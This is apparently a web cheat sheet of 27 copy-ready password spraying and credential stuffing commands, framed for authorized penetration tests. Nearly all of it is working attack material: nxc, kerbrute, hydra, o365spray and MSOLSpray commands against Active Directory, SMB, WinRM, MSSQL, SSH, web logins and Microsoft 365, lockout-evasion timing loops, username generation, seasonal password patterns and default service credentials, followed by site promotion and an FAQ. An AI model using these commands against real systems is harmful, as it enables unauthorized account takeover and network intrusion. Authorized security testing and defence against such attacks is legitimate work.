Copy-ready password spraying and credential stuffing commands for authorized pentests, with lockout-aware timing and scope guidance throughout. (27 payloads)
nxc smb dc01.corp.local -u <validuser> -p '<knownpass>' --pass-polGet-ADDefaultDomainPasswordPolicy | fl LockoutThreshold,LockoutDuration,LockoutObservationWindowldapsearch -x -H ldap://dc01 -D 'CORP\\user' -w '<pass>' -b 'DC=corp,DC=local' '(objectClass=domainDNS)' lockoutThreshold lockOutObservationWindowkerbrute userenum -d corp.local --dc dc01.corp.local /usr/share/seclists/Usernames/Names/names.txt -o valid_users.txtfor f in $(cat first.txt); do for l in $(cat last.txt); do echo "${f:0:1}$l"; done; done > users.txtpython3 namemash.py employees.txt | sort -u > users.txtnxc smb dc01.corp.local -u '' -p '' --users | awk '{print $5}' > domain_users.txtkerbrute passwordspray -d corp.local --dc dc01.corp.local valid_users.txt 'Spring2026!' --safe -o spray.lognxc smb targets.txt -u users.txt -p 'Winter2026!' -d corp.local --continue-on-successnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce --continue-on-successnxc ldap dc01.corp.local -u users.txt -p 'Welcome1' -k --continue-on-successnxc winrm targets.txt -u users.txt -p 'Summer2026!' --continue-on-successcrackmapexec smb 10.0.0.0/24 -u administrator -p passwords.txt --local-auth --continue-on-successnxc mssql sql01.corp.local -u sa -p passwords.txt --local-auth --continue-on-successo365spray --spray -U users.txt -p 'Spring2026!' --count 1 --lockout 30 --domain corp.comInvoke-MSOLSpray -UserList users.txt -Password 'Summer2026!' -Verbosehydra -L users.txt -p 'P@ssw0rd1' ssh://10.0.0.5 -t 4 -W 5hydra -L users.txt -p 'Welcome2026!' 10.0.0.5 http-post-form '/login:user=^USER^&pass=^PASS^:F=Invalid credentials' -t 3hydra -C combos.txt ssh://10.0.0.5 -t 1kerbrute passwordspray -d corp.local --dc dc01 users.txt 'Autumn2026!' --delay 1000 -t 1for p in 'Winter2026!' 'Spring2026!' 'Summer2026!'; do nxc smb dc01 -u users.txt -p "$p" --continue-on-success; echo "[*] sleeping observation window..."; sleep 1800; donenxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 1nxc smb dc01 -u users.txt -p 'Pass1' --jitter 5-15 --continue-on-success<Season><Year>! -> Winter2026! Spring2026! Summer2026! Autumn2026! Fall2026!<CompanyName>1! <CompanyName>2026 Welcome1 Welcome2026! Password1 Password123!Default service creds: admin:admin root:toor sa:(blank) admin:password tomcat:tomcat cisco:ciscokwprocessor or hashcat rules: keyboard walks - Qwerty123! 1qaz@WSX Zxcvbnm1 Asdf1234!Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 27 Password Spraying payloads for testing Password Spraying vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or use the Password & Wordlist Generator to apply them interactively. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all Password Spraying payloads are completely free, with no account required. Everything runs in your browser.